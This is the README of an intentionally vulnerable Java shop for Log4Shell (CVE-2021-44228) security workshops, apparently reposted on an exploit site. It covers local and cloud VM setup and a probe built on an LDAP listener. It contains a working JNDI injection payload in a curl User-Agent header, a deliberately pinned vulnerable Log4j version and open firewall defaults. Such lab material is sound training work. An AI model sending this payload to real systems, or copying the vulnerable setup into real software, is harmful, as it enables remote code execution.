Share
## https://sploitus.com/exploit?id=96481E3A-BD45-5C86-BDC0-C53DA4423438
# TraditionalJay

Intentionally vulnerable **classic / traditional** shop for security workshops โ€” Java on a **VM** (EC2, Azure VM, or GCP Compute Engine), not containers.

Primary story: **Log4Shell (CVE-2021-44228)** via **Log4j 2.14.1**.

> [!CAUTION]
> **Do not deploy to production accounts.** Keep VMs ephemeral and network-scoped to your lab.

## Why this exists

Jay's Surf Shop covers cloud-native runtimes (ECS / ACA / GKE). TraditionalJay covers the **host / VM** lane:

| | Surf Shop | TraditionalJay |
|--|-----------|----------------|
| Compute | Containers / serverless | Single Linux VM |
| Stack | Next.js + Python | Spring Boot + Log4j2 |
| Headline CVE | Pillow, React2Shell, YAML, โ€ฆ | **Log4Shell** |

## Quick start (local)

```bash
cd app
mvn -DskipTests spring-boot:run
# open http://localhost:8080
# exploit lab: http://localhost:8080/security
```

Java **11+** and Maven required.

### Log4Shell probe (workshop-safe)

1. Start a banner LDAP listener (no exploit payload served):

```bash
python3 tools/ldap-listen.py --port 1389
```

2. Open `/security`, set callback to `YOUR_IP:1389`, click **Run Log4Shell probe**.

3. The VM/Java process attempts outbound LDAP โ€” that dial-out (+ SCA on `log4j-core:2.14.1`) is the demo signal.

You can also hit search with a crafted `User-Agent`:

```bash
curl -s "http://localhost:8080/search?q=wax" \
  -H 'User-Agent: ${jndi:ldap://127.0.0.1:1389/a}' -o /dev/null
```

## CI

GitHub Actions workflow [`.github/workflows/build.yml`](.github/workflows/build.yml):

- **push / PR / manual** โ†’ Maven package + upload JAR artifact  
- **tag `v*`** โ†’ GitHub Release with the fat JAR  

VMs prefer the latest Release JAR via `scripts/install-vm.sh`, and fall back to an on-box Maven build if no release exists yet.

```bash
# cut a release (triggers JAR publish)
git tag v0.1.0 && git push origin v0.1.0
```

## Deploy to a cloud VM

Each cloud folder is standalone Terraform. First boot runs `scripts/install-vm.sh` (OpenJDK 11 + Release JAR or Maven build + systemd).

### AWS (EC2)

```bash
cd infrastructure/aws
terraform init
terraform apply
terraform output application_url
```

### Azure (VM)

```bash
cd infrastructure/azure
terraform init
terraform apply -var="ssh_public_key=$(cat ~/.ssh/id_rsa.pub)"
terraform output application_url
```

### GCP (Compute Engine)

```bash
cd infrastructure/gcp
terraform init
terraform apply -var="project_id=YOUR_PROJECT"
terraform output application_url
```

First boot takes a few minutes while Maven builds on the instance. Then open `http://PUBLIC_IP:8080/security`.

## Layout

```
app/                     Spring Boot shop + /security Log4Shell UI
tools/ldap-listen.py     Banner-only LDAP listener for demos
scripts/install-vm.sh    Cloud-init / manual VM installer
infrastructure/aws|azure|gcp
```

## Safety notes

- Demo path **does not** ship a reverse-shell gadget; it triggers a **JNDI LDAP lookup** to a listener you control.
- Default firewalls allow `0.0.0.0/0` on 22/8080 โ€” tighten `*_ingress_cidr` / source ranges for shared labs.
- Pin stays on **Log4j 2.14.1** on purpose. Do not โ€œfixโ€ it without replacing the exercise.